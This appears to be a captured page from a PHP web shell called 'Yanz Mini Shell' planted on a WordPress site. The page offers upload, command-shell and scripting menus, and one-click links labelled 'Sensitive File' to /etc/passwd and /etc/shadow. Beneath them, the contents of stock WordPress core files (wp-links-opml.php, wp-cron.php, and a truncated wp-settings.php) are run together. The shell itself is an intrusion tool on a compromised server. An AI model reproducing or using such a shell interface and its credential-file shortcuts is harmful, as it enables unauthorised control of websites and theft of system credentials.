Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
masterro
public_html
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php /** * Outputs the OPML XML format for getting the links defined in the link * administration. This can be used to export links from one blog over to * another. Links aren't exported by the WordPress export, so this file handles * that. * * This file is not added by default to WordPress theme pages when outputting * feed links. It will have to be added manually for browsers and users to pick * up that this file exists. * * @package WordPress */ require_once __DIR__ . '/wp-load.php'; header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); $link_cat = ''; if ( ! empty( $_GET['link_cat'] ) ) { $link_cat = $_GET['link_cat']; if ( ! in_array( $link_cat, array( 'all', '0' ), true ) ) { $link_cat = absint( urldecode( $link_cat ) ); } } echo '<?xml version="1.0"?' . ">\n"; ?> <opml version="1.0"> <head> <title> <?php /* translators: %s: Site title. */ printf( __( 'Links for %s' ), esc_attr( get_bloginfo( 'name', 'display' ) ) ); ?> </title> <dateCreated><?php echo gmdate( 'D, d M Y H:i:s' ); ?> GMT</dateCreated> <?php /** * Fires in the OPML header. * * @since 3.0.0 */ do_action( 'opml_head' ); ?> </head> <body> <?php if ( empty( $link_cat ) ) { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, ) ); } else { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, 'include' => $link_cat, ) ); } foreach ( (array) $cats as $cat ) : /** This filter is documented in wp-includes/bookmark-template.php */ $catname = apply_filters( 'link_category', $cat->name ); ?> <outline type="category" title="<?php echo esc_attr( $catname ); ?>"> <?php $bookmarks = get_bookmarks( array( 'category' => $cat->term_id ) ); foreach ( (array) $bookmarks as $bookmark ) : /** * Filters the OPML outline link title text. * * @since 2.2.0 * * @param string $title The OPML outline title text. */ $title = apply_filters( 'link_title', $bookmark->link_name ); ?> <outline text="<?php echo esc_attr( $title ); ?>" type="link" xmlUrl="<?php echo esc_url( $bookmark->link_rss ); ?>" htmlUrl="<?php echo esc_url( $bookmark->link_url ); ?>" updated=" <?php if ( '0000-00-00 00:00:00' !== $bookmark->link_updated ) { echo $bookmark->link_updated; } ?> " /> <?php endforeach; // $bookmarks ?> </outline> <?php endforeach; // $cats ?> </body> </opml> <?php /** * A pseudo-cron daemon for scheduling WordPress tasks. * * WP-Cron is triggered when the site receives a visit. In the scenario * where a site may not receive enough visits to execute scheduled tasks * in a timely manner, this file can be called directly or via a server * cron daemon for X number of times. * * Defining DISABLE_WP_CRON as true and calling this file directly are * mutually exclusive and the latter does not rely on the former to work. * * The HTTP request to this file will not slow down the visitor who happens to * visit when a scheduled cron event runs. * * @package WordPress */ ignore_user_abort( true ); if ( ! headers_sent() ) { header( 'Expires: Wed, 11 Jan 1984 05:00:00 GMT' ); header( 'Cache-Control: no-cache, must-revalidate, max-age=0' ); } // Don't run cron until the request finishes, if possible. if ( function_exists( 'fastcgi_finish_request' ) ) { fastcgi_finish_request(); } elseif ( function_exists( 'litespeed_finish_request' ) ) { litespeed_finish_request(); } if ( ! empty( $_POST ) || defined( 'DOING_AJAX' ) || defined( 'DOING_CRON' ) ) { die(); } /** * Tell WordPress the cron task is running. * * @var bool */ define( 'DOING_CRON', true ); if ( ! defined( 'ABSPATH' ) ) { /** Set up WordPress environment */ require_once __DIR__ . '/wp-load.php'; } // Attempt to raise the PHP memory limit for cron event processing. wp_raise_memory_limit( 'cron' ); /** * Retrieves the cron lock. * * Returns the uncached `doing_cron` transient. * * @ignore * @since 3.3.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @return string|int|false Value of the `doing_cron` transient, 0|false otherwise. */ function _get_cron_lock() { global $wpdb; $value = 0; if ( wp_using_ext_object_cache() ) { /* * Skip local cache and force re-fetch of doing_cron transient * in case another process updated the cache. */ $value = wp_cache_get( 'doing_cron', 'transient', true ); } else { $row = $wpdb->get_row( $wpdb->prepare( "SELECT option_value FROM $wpdb->options WHERE option_name = %s LIMIT 1", '_transient_doing_cron' ) ); if ( is_object( $row ) ) { $value = $row->option_value; } } return $value; } $crons = wp_get_ready_cron_jobs(); if ( empty( $crons ) ) { die(); } $gmt_time = microtime( true ); // The cron lock: a unix timestamp from when the cron was spawned. $doing_cron_transient = get_transient( 'doing_cron' ); // Use global $doing_wp_cron lock, otherwise use the GET lock. If no lock, try to grab a new lock. if ( empty( $doing_wp_cron ) ) { if ( empty( $_GET['doing_wp_cron'] ) ) { // Called from external script/job. Try setting a lock. if ( $doing_cron_transient && ( $doing_cron_transient + WP_CRON_LOCK_TIMEOUT > $gmt_time ) ) { return; } $doing_wp_cron = sprintf( '%.22F', microtime( true ) ); $doing_cron_transient = $doing_wp_cron; set_transient( 'doing_cron', $doing_wp_cron ); } else { $doing_wp_cron = $_GET['doing_wp_cron']; } } /* * The cron lock (a unix timestamp set when the cron was spawned), * must match $doing_wp_cron (the "key"). */ if ( $doing_cron_transient !== $doing_wp_cron ) { return; } foreach ( $crons as $timestamp => $cronhooks ) { if ( $timestamp > $gmt_time ) { break; } foreach ( $cronhooks as $hook => $keys ) { foreach ( $keys as $k => $v ) { $schedule = $v['schedule']; if ( $schedule ) { $result = wp_reschedule_event( $timestamp, $schedule, $hook, $v['args'], true ); if ( is_wp_error( $result ) ) { error_log( sprintf( /* translators: 1: Hook name, 2: Error code, 3: Error message, 4: Event data. */ __( 'Cron reschedule event error for hook: %1$s, Error code: %2$s, Error message: %3$s, Data: %4$s' ), $hook, $result->get_error_code(), $result->get_error_message(), wp_json_encode( $v ) ) ); /** * Fires if an error happens when rescheduling a cron event. * * @since 6.1.0 * * @param WP_Error $result The WP_Error object. * @param string $hook Action hook to execute when the event is run. * @param array $v Event data. */ do_action( 'cron_reschedule_event_error', $result, $hook, $v ); } } $result = wp_unschedule_event( $timestamp, $hook, $v['args'], true ); if ( is_wp_error( $result ) ) { error_log( sprintf( /* translators: 1: Hook name, 2: Error code, 3: Error message, 4: Event data. */ __( 'Cron unschedule event error for hook: %1$s, Error code: %2$s, Error message: %3$s, Data: %4$s' ), $hook, $result->get_error_code(), $result->get_error_message(), wp_json_encode( $v ) ) ); /** * Fires if an error happens when unscheduling a cron event. * * @since 6.1.0 * * @param WP_Error $result The WP_Error object. * @param string $hook Action hook to execute when the event is run. * @param array $v Event data. */ do_action( 'cron_unschedule_event_error', $result, $hook, $v ); } /** * Fires scheduled events. * * @ignore * @since 2.1.0 * * @param string $hook Name of the hook that was scheduled to be fired. * @param array $args The arguments to be passed to the hook. */ do_action_ref_array( $hook, $v['args'] ); // If the hook ran too long and another cron process stole the lock, quit. if ( _get_cron_lock() !== $doing_wp_cron ) { return; } } } } if ( _get_cron_lock() === $doing_wp_cron ) { delete_transient( 'doing_cron' ); } die(); <?php /** * Used to set up and fix common variables and include * the WordPress procedural and class library. * * Allows for some configuration in wp-config.php (see default-constants.php) * * @package WordPress */ /** * Stores the location of the WordPress directory of functions, classes, and core content. * * @since 1.0.0 */ define( 'WPINC', 'wp-includes' ); /** * Version information for the current WordPress release. * * These can't be directly globalized in version.php. When updating, * include version.php from another installation and don't override * these values if already set. * * @global string $wp_version The WordPress version string. * @global int $wp_db_version WordPress database version. * @global string $tinymce_version TinyMCE version. * @global string $required_php_version The minimum required PHP version string. * @global string[] $required_php_extensions The names of required PHP extensions. * @global string $required_mysql_version The minimum required MySQL version string. * @global string $wp_local_package Locale code of the package. */ global $wp_version, $wp_db_version, $tinymce_version, $required_php_version, $required_php_extensions, $required_mysql_version, $wp_local_package; require ABSPATH . WPINC . '/version.php'; require ABSPATH . WPINC . '/compat-utf8.php'; require ABSPATH . WPINC . '/compat.php'; require ABSPATH . WPINC . '/load.php'; // Check the server requirements. wp_check_php_mysql_versions(); // Include files required for initialization. require ABSPATH . WPINC . '/class-wp-paused-extensions-storage.php'; require ABSPATH . WPINC . '/class-wp-exception.php'; require ABSPATH . WPINC . '/class-wp-fatal-error-handler.php'; require ABSPATH . WPINC . '/class-wp-recovery-mode-cookie-service.php'; require ABSPATH . WPINC . '/class-wp-recovery-mode-key-service.php'; require ABSPATH . WPINC . '/class-wp-recovery-mode-link-service.php'; require ABSPATH . WPINC . '/class-wp-recovery-mode-email-service.php'; require ABSPATH . WPINC . '/class-wp-recovery-mode.php'; require ABSPATH . WPINC . '/error-protection.php'; require ABSPATH . WPINC . '/default-constants.php'; require_once ABSPATH . WPINC . '/plugin.php'; /** * If not already configured, `$blog_id` will default to 1 in a single site * configuration. In multisite, it will be overridden by default in ms-settings.php. * * @since 2.0.0 * * @global int $blog_id */ global $blog_id; // Set initial default constants including WP_MEMORY_LIMIT, WP_MAX_MEMORY_LIMIT, WP_DEBUG, SCRIPT_DEBUG, WP_CONTENT_DIR and WP_CACHE. wp_initial_constants(); // Register the shutdown handler for fatal errors as soon as possible. wp_register_fatal_error_handler(); // WordPress calculates offsets from UTC. // phpcs:ignore WordPress.DateTime.RestrictedFunctions.timezone_change_date_default_timezone_set date_default_timezone_set( 'UTC' ); // Standardize $_SERVER variables across setups. wp_fix_server_vars(); // Check if the site is in maintenance mode. wp_maintenance(); // Start loading timer. timer_start(); // Check if WP_DEBUG mode is enabled. wp_debug_mode(); /** * Filters whether to enable loading of the advanced-cache.php drop-in. * * This filter runs before it can be used by plugins. It is designed for non-web * run-times. If false is returned, advanced-cache.php will never be loaded. * * @since 4.6.0 * * @param bool $enable_advanced_cache Whether to enable loading advanced-cache.php (if present). * Default true. */ if ( WP_CACHE && apply_filters( 'enable_loading_advanced_cache_dropin', true ) && file_exists( WP_CONTENT_DIR . '/advanced-cache.php' ) ) { // For an advanced caching plugin to use. Uses a static drop-in because you would only want one. include WP_CONTENT_DIR . '/advanced-cache.php'; // Re-initialize any hooks added manually by advanced-cache.php. if ( $wp_filter ) { $wp_filter = WP_Hook::build_preinitialized_hooks( $wp_filter ); } } // Define WP_LANG_DIR if not set. wp_set_lang_dir(); // Load early WordPress files. require ABSPATH . WPINC . '/class-wp-list-util.php'; require ABSPATH . WPINC . '/class-wp-token-map.php'; require ABSPATH . WPINC . '/utf8.php'; require ABSPATH . WPINC . '/formatting.php'; require ABSPATH . WPINC . '/meta.php'; require ABSPATH . WPINC . '/functions.php'; require ABSPATH . WPINC . '/class-wp-meta-query.php'; require ABSPATH . WPINC . '/class-wp-matchesmapregex.php'; require ABSPATH . WPINC . '/class-wp.php'; require ABSPATH . WPINC . '/class-wp-error.php'; require ABSPATH . WPINC . '/pomo/mo.php'; require ABSPATH . WPINC . '/l10n/class-wp-translation-controller.php'; require ABSPATH . WPINC . '/l10n/class-wp-translations.php'; require ABSPATH . WPINC . '/l10n/class-wp-translation-file.php'; require ABSPATH . WPINC . '/l10n/class-wp-translation-file-mo.php'; require ABSPATH . WPINC . '/l10n/class-wp-translation-file-php.php'; /** * @since 0.71 * * @global wpdb $wpdb WordPress database abstraction object. */ global $wpdb; // Include the wpdb class and, if present, a db.php database drop-in. require_wp_db(); /** * @since 3.3.0 * * @global string $table_prefix The database table prefix. */ if ( ! isset( $GLOBALS['table_prefix'] ) ) { $GLOBALS['table_prefix'] = $table_prefix; } // Set the database table prefix and the format specifiers for database table columns. wp_set_wpdb_vars(); // Start the WordPress object cache, or an external object cache if the drop-in is present. wp_start_object_cache(); // Attach the default filters. require ABSPATH . WPINC . '/default-filters.php'; // Initialize multisite if enabled. if ( is_multisite() ) { require ABSPATH . WPINC . '/class-wp-site-query.php'; require ABSPATH . WPINC . '/class-wp-network-query.php'; require ABSPATH . WPINC . '/ms-blogs.php'; require ABSPATH . WPINC . '/ms-settings.php'; } elseif ( ! defined( 'MULTISITE' ) ) { define( 'MULTISITE', false ); } register_shutdown_function( 'shutdown_action_hook' ); // Stop most of WordPress from being loaded if SHORTINIT is enabled. if ( SHORTINIT ) { return false; } // Load the L10n library. require_once ABSPATH . WPINC . '/l10n.php'; require_once ABSPATH . WPINC . '/class-wp-textdomain-registry.php'; require_once ABSPATH . WPINC . '/class-wp-locale.php'; require_once ABSPATH . WPINC . '/class-wp-locale-switcher.php'; // Run the installer if WordPress is not installed. wp_not_installed(); // Load most of WordPress. require ABSPATH . WPINC . '/class-wp-walker.php'; require ABSPATH . WPINC . '/class-wp-ajax-response.php'; require ABSPATH . WPINC . '/capabilities.php'; require ABSPATH . WPINC . '/class-wp-roles.php'; require ABSPATH . WPINC . '/class-wp-role.php'; require ABSPATH . WPINC . '/class-wp-user.php'; require ABSPATH . WPINC . '/class-wp-query.php'; require ABSPATH . WPINC . '/query.php'; require ABSPATH . WPINC . '/class-wp-date-query.php'; require ABSPATH . WPINC . '/theme.php'; require ABSPATH . WPINC . '/class-wp-theme.php'; require ABSPATH . WPINC . '/class-wp-theme-json-schema.php'; require ABSPATH . WPINC . '/class-wp-theme-json-data.php'; require ABSPATH . WPINC . '/class-wp-theme-json.php'; require ABSPATH . WPINC . '/class-wp-theme-json-resolver.php'; require ABSPATH . WPINC . '/class-wp-duotone.php'; require ABSPATH . WPINC . '/global-styles-and-settings.php'; require ABSPATH . WPINC . '/class-wp-block-template.php'; require ABSPATH . WPINC . '/class-wp-block-templates-registry.php'; require ABSPATH . WPINC . '/block-template-utils.php'; require ABSPATH . WPINC . '/block-template.php'; require ABSPATH . WPINC . '/theme-templates.php'; require ABSPATH . WPINC . '/theme-previews.php'; require ABSPATH . WPINC . '/template.php'; require ABSPATH . WPINC . '/https-detection.php'; require ABSPATH . WPINC . '/https-migration.php'; require ABSPATH . WPINC . '/class-wp-user-request.php'; require ABSPATH . WPINC . '/user.php'; require ABSPATH . WPINC . '/class-wp-user-query.php'; require ABSPATH . WPINC . '/class-wp-session-tokens.php'; require ABSPATH . WPINC . '/class-wp-user-meta-session-tokens.php'; require ABSPATH . WPINC . '/general-template.php'; require ABSPATH . WPINC . '/link-template.php'; require ABSPATH . WPINC . '/author-template.php'; require ABSPATH . WPINC . '/robots-template.php'; require ABSPATH . WPINC . '/post.php'; require ABSPATH . WPINC . '/class-walker-page.php'; require ABSPATH . WPINC . '/class-walker-page-dropdown.php'; require ABSPATH . WPINC . '/class-wp-post-type.php'; require ABSPATH . WPINC . '/class-wp-post.php'; require ABSPATH . WPINC . '/post-template.php'; require ABSPATH . WPINC . '/revision.php'; require ABSPATH . WPINC . '/post-formats.php'; require ABSPATH . WPINC . '/post-thumbnail-template.php'; require ABSPATH . WPINC . '/category.php'; require ABSPATH . WPINC . '/class-walker-category.php'; require ABSPATH . WPINC . '/class-walker-category-dropdown.php'; require ABSPATH . WPINC . '/category-template.php'; require ABSPATH . WPINC . '/comment.php'; require ABSPATH . WPINC . '/class-wp-comment.php'; require ABSPATH . WPINC . '/class-wp-comment-query.php'; require ABSPATH . WPINC . '/class-walker-comment.php'; require ABSPATH . WPINC . '/comment-template.php'; require ABSPATH . WPINC . '/rewrite.php'; require ABSPATH . WPINC . '/class-wp-rewrite.php'; require ABSPATH . WPINC . '/feed.php'; require ABSPATH . WPINC . '/bookmark.php'; require ABSPATH . WPINC . '/bookmark-template.php'; require ABSPATH . WPINC . '/kses.php'; require ABSPATH . WPINC . '/cron.php'; require ABSPATH . WPINC . '/deprecated.php'; require ABSPATH . WPINC . '/script-loader.php'; if ( file_exists( ABSPATH . WPINC . '/build/routes.php' ) ) { require ABSPATH . WPINC . '/build/routes.php'; } if ( file_exists( ABSPATH . WPINC . '/build/pages.php' ) ) { require ABSPATH . WPINC . '/build/pages.php'; } require ABSPATH . WPINC . '/taxonomy.php'; require ABSPATH . WPINC . '/class-wp-taxonomy.php'; require ABSPATH . WPINC . '/class-wp-term.php'; require ABSPATH . WPINC . '/class-wp-term-query.php'; require ABSPATH . WPINC . '/class-wp-tax-query.php'; require ABSPATH . WPINC . '/update.php'; require ABSPATH . WPINC . '/canonical.php'; require ABSPATH . WPINC . '/shortcodes.php'; require ABSPATH . WPINC . '/embed.php'; require ABSPATH . WPINC . '/class-wp-embed.php'; require ABSPATH . WPINC . '/class-wp-oembed.php'; require ABSPATH . WPINC . '/class-wp-oembed-controller.php'; require ABSPATH . WPINC . '/media.php'; require ABSPATH . WPINC . '/http.php'; require ABSPATH . WPINC . '/html-api/html5-named-character-references.php'; require ABSPATH . WPINC . '/html-api/class-wp-html-attribute-token.php'; require ABSPATH . WPINC . '/html-api/class-wp-html-span.php'; require ABSPATH . WPINC . '/html-api/class-wp-html-doctype-info.php'; require ABSPATH . WPINC . '/html-api/class-wp-html-text-replacement.php'; require ABSPATH . WPINC . '/html-api/class-wp-html-decoder.php'; require ABSPATH . WPINC . '/html-api/class-wp-html-tag-processor.php'; require ABSPATH . WPINC . '/html-api/class-wp-html-unsupported-exception.php'; require ABSPATH . WPINC . '/html-api/class-wp-html-active-formatting-elements.php'; require ABSPATH . WPINC . '/html-api/class-wp-html-open-elements.php'; require ABSPATH . WPINC . '/html-api/class-wp-html-token.php'; require ABSPATH . WPINC . '/html-api/class-wp-html-stack-event.php'; require ABSPATH . WPINC . '/html-api/class-wp-html-processor-state.php'; require ABSPATH . WPINC . '/html-api/class-wp-html-processor.php'; require ABSPATH . WPINC . '/class-wp-block-processor.php'; require ABSPATH . WPINC . '/class-wp-http.php'; require ABSPATH . WPINC . '/class-wp-http-streams.php'; require ABSPATH . WPINC . '/class-wp-http-curl.php'; require ABSPATH . WPINC . '/class-wp-http-proxy.php'; require ABSPATH . WPINC . '/class-wp-http-cookie.php'; require ABSPATH . WPINC . '/class-wp-http-encoding.php'; require ABSPATH . WPINC . '/class-wp-http-response.php'; require ABSPATH . WPINC . '/class-wp-http-requests-response.php'; require ABSPATH . WPINC . '/class-wp-http-requests-hooks.php'; require ABSPATH . WPINC . '/php-ai-client/autoload.php'; require ABSPATH . WPINC . '/ai-client/adapters/class-wp-ai-client-http-client.php'; require ABSPATH . WPINC . '/ai-client/adapters/class-wp-ai-client-cache.php'; require ABSPATH . WPINC . '/ai-client/adapters/class-wp-ai-client-discovery-strategy.php'; require ABSPATH . WPINC . '/ai-client/adapters/class-wp-ai-client-event-dispatcher.php'; require ABSPATH . WPINC . '/ai-client/class-wp-ai-client-ability-function-resolver.php'; require ABSPATH . WPINC . '/ai-client/class-wp-ai-client-prompt-builder.php'; require ABSPATH . WPINC . '/ai-client.php'; require ABSPATH . WPINC . '/class-wp-connector-registry.php'; require ABSPATH . WPINC . '/connectors.php'; require ABSPATH . WPINC . '/class-wp-icons-registry.php'; require ABSPATH . WPINC . '/widgets.php'; require ABSPATH . WPINC . '/class-wp-widget.php'; require ABSPATH . WPINC . '/class-wp-widget-factory.php'; require ABSPATH . WPINC . '/nav-menu-template.php'; require ABSPATH . WPINC . '/nav-menu.php'; require ABSPATH . WPINC . '/admin-bar.php'; require ABSPATH . WPINC . '/class-wp-application-passwords.php'; require ABSPATH . WPINC . '/abilities-api/class-wp-ability-category.php'; require ABSPATH . WPINC . '/abilities-api/class-wp-ability-categories-registry.php'; require ABSPATH . WPINC . '/abilities-api/class-wp-ability.php'; require ABSPATH . WPINC . '/abilities-api/class-wp-abilities-registry.php'; require ABSPATH . WPINC . '/abilities-api.php'; require ABSPATH . WPINC . '/abilities.php'; require ABSPATH . WPINC . '/rest-api.php'; require ABSPATH . WPINC . '/rest-api/class-wp-rest-server.php'; require ABSPATH . WPINC . '/rest-api/class-wp-rest-response.php'; require ABSPATH . WPINC . '/rest-api/class-wp-rest-request.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-posts-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-attachments-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-global-styles-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-post-types-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-revisions-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-global-styles-revisions-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-template-revisions-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-autosaves-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-template-autosaves-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-terms-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-menu-items-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-menus-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-menu-locations-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-users-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-comments-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-search-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-blocks-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-block-types-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-settings-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-themes-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-plugins-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-block-directory-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-edit-site-export-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-pattern-directory-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-block-patterns-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-block-pattern-categories-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-application-passwords-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-site-health-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-sidebars-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-widget-types-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-widgets-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-templates-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-url-details-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-navigation-fallback-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-font-families-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-font-faces-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-font-collections-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-icons-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-abilities-v1-categories-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-abilities-v1-list-controller.php'; require ABSPATH . WPINC . '/rest-api/endpoints/class-wp-rest-abilities-v1-run-controller.php'; require ABSPATH . WPINC . '/rest-api/fields/class-wp-rest-meta-fields.php'; require ABSPATH . WPINC . '/rest-api/fields/class-wp-rest-comment-meta-fields.php'; require ABSPATH . WPINC . '/rest-api/fields/class-wp-rest-post-meta-fields.php'; require ABSPATH . WPINC . '/rest-api/fields/class-wp-rest-term-meta-fields.php'; require ABSPATH . WPINC . '/rest-api/fields/class-wp-rest-user-meta-fields.php'; require ABSPATH . WPINC . '/rest-api/search/class-wp-rest-search-handler.php'; require ABSPATH . WPINC . '/rest-api/search/class-wp-rest-post-search-handler.php'; require ABSPATH . WPINC . '/rest-api/search/class-wp-rest-term-search-handler.php'; require ABSPATH . WPINC . '/rest-api/search/class-wp-rest-post-format-search-handler.php'; require ABSPATH . WPINC . '/sitemaps.php'; require ABSPATH . WPINC . '/sitemaps/class-wp-sitemaps.php'; require ABSPATH . WPINC . '/sitemaps/class-wp-sitemaps-index.php'; require ABSPATH . WPINC . '/sitemaps/class-wp-sitemaps-provider.php'; require ABSPATH . WPINC . '/sitemaps/class-wp-sitemaps-registry.php'; require ABSPATH . WPINC . '/sitemaps/class-wp-sitemaps-renderer.php'; require ABSPATH . WPINC . '/sitemaps/class-wp-sitemaps-stylesheet.php'; require ABSPATH . WPINC . '/sitemaps/providers/class-wp-sitemaps-posts.php'; require ABSPATH . WPINC . '/sitemaps/providers/class-wp-sitemaps-taxonomies.php'; require ABSPATH . WPINC . '/sitemaps/providers/class-wp-sitemaps-users.php'; require ABSPATH . WPINC . '/class-wp-block-bindings-source.php'; require ABSPATH . WPINC . '/class-wp-block-bindings-registry.php'; require ABSPATH . WPINC . '/class-wp-block-editor-context.php'; require ABSPATH . WPINC . '/class-wp-block-type.php'; require ABSPATH . WPINC . '/class-wp-block-pattern-categories-registry.php'; require ABSPATH . WPINC . '/class-wp-block-patterns-registry.php'; require ABSPATH . WPINC . '/class-wp-block-styles-registry.php'; require ABSPATH . WPINC . '/class-wp-block-type-registry.php'; require ABSPATH . WPINC . '/class-wp-block.php'; require ABSPATH . WPINC . '/class-wp-block-list.php'; require ABSPATH . WPINC . '/class-wp-block-metadata-registry.php'; require ABSPATH . WPINC . '/class-wp-block-parser-block.php'; require ABSPATH . WPINC . '/class-wp-block-parser-frame.php'; require ABSPATH . WPINC . '/class-wp-block-parser.php'; require ABSPATH . WPINC . '/class-wp-classic-to-block-menu-converter.php'; require ABSPATH . WPINC . '/class-wp-navigation-fallback.php'; require ABSPATH . WPINC . '/block-bindings.php'; require ABSPATH . WPINC . '/block-bindings/pattern-overrides.php'; require ABSPATH . WPINC . '/block-bindings/post-data.php'; require ABSPATH . WPINC . '/block-bindings/post-meta.php'; require ABSPATH . WPINC . '/block-bindings/term-data.php'; require ABSPATH . WPINC . '/blocks.php'; require ABSPATH . WPINC . '/blocks/index.php'; require ABSPATH . WPINC . '/block-editor.php'; require ABSPATH . WPINC . '/block-patterns.php'; require ABSPATH . WPINC . '/class-wp-block-supports.php'; require ABSPATH . WPINC . '/block-supports/utils.php'; require ABSPATH . WPINC . '/block-supports/align.php'; require ABSPATH . WPINC . '/block-supports/auto-register.php'; require ABSPATH . WPINC . '/block-supports/custom-classname.php'; require ABSPATH . WPINC . '/block-supports/generated-classname.php'; require ABSPATH . WPINC . '/block-supports/settings.php'; require ABSPATH . WPINC . '/block-supports/elements.php'; require ABSPATH . WPINC . '/block-supports/colors.php'; require ABSPATH . WPINC . '/block-supports/typography.php'; require ABSPATH . WPINC . '/block-supports/border.php'; require ABSPATH . WPINC . '/block-supports/layout.php'; require ABSPATH . WPINC . '/block-supports/position.php'; require ABSPATH . WPINC . '/block-supports/spacing.php'; require ABSPATH . WPINC . '/block-supports/dimensions.php'; require ABSPATH . WPINC . '/block-supports/duotone.php'; require ABSPATH . WPINC . '/block-supports/shadow.php'; require ABSPATH . WPINC . '/block-supports/background.php'; require ABSPATH . WPINC . '/block-supports/block-style-variations.php'; require ABSPATH . WPINC . '/block-supports/aria-label.php'; require ABSPATH . WPINC . '/block-supports/anchor.php'; require ABSPATH . WPINC . '/block-supports/block-visibility.php'; require ABSPATH . WPINC . '/block-supports/custom-css.php'; require ABSPATH . WPINC . '/style-engine.php'; require ABSPATH . WPINC . '/style-engine/class-wp-style-engine.php'; require ABSPATH . WPINC . '/style-engine/class-wp-style-engine-css-declarations.php'; require ABSPATH . WPINC . '/style-engine/class-wp-style-engine-css-rule.php'; require ABSPATH . WPINC . '/style-engine/class-wp-style-engine-css-rules-store.php'; require ABSPATH . WPINC . '/style-engine/class-wp-style-engine-processor.php'; require ABSPATH . WPINC . '/fonts/class-wp-font-face-resolver.php'; require ABSPATH . WPINC . '/fonts/class-wp-font-collection.php'; require ABSPATH . WPINC . '/fonts/class-wp-font-face.php'; require ABSPATH . WPINC . '/fonts/class-wp-font-library.php'; require ABSPATH . WPINC . '/fonts/class-wp-font-utils.php'; require ABSPATH . WPINC . '/fonts.php'; require ABSPATH . WPINC . '/class-wp-script-modules.php'; require ABSPATH . WPINC . '/script-modules.php'; require ABSPATH . WPINC . '/interactivity-api/class-wp-interactivity-api.php'; require ABSPATH . WPINC . '/interactivity-api/class-wp-interactivity-api-directives-processor.php'; require ABSPATH . WPINC . '/interactivity-api/interactivity-api.php'; require ABSPATH . WPINC . '/class-wp-plugin-dependencies.php'; require ABSPATH . WPINC . '/class-wp-url-pattern-prefixer.php'; require ABSPATH . WPINC . '/class-wp-speculation-rules.php'; require ABSPATH . WPINC . '/speculative-loading.php'; require ABSPATH . WPINC . '/view-transitions.php'; add_action( 'after_setup_theme', array( wp_script_modules(), 'add_hooks' ) ); add_action( 'after_setup_theme', array( wp_interactivity(), 'add_hooks' ) ); /** * @since 3.3.0 * * @global WP_Embed $wp_embed WordPress Embed object. */ $GLOBALS['wp_embed'] = new WP_Embed(); /** * WordPress Textdomain Registry object. * * Used to support just-in-time translations for manually loaded text domains. * * @since 6.1.0 * * @global WP_Textdomain_Registry $wp_textdomain_registry WordPress Textdomain Registry. */ $GLOBALS['wp_textdomain_registry'] = new WP_Textdomain_Registry(); $GLOBALS['wp_textdomain_registry']->init(); // WordPress AI Client initialization. WP_AI_Client_Discovery_Strategy::init(); WordPress\AiClient\AiClient::setCache( new WP_AI_Client_Cache() ); WordPress\AiClient\AiClient::setEventDispatcher( new WP_AI_Client_Event_Dispatcher() ); // 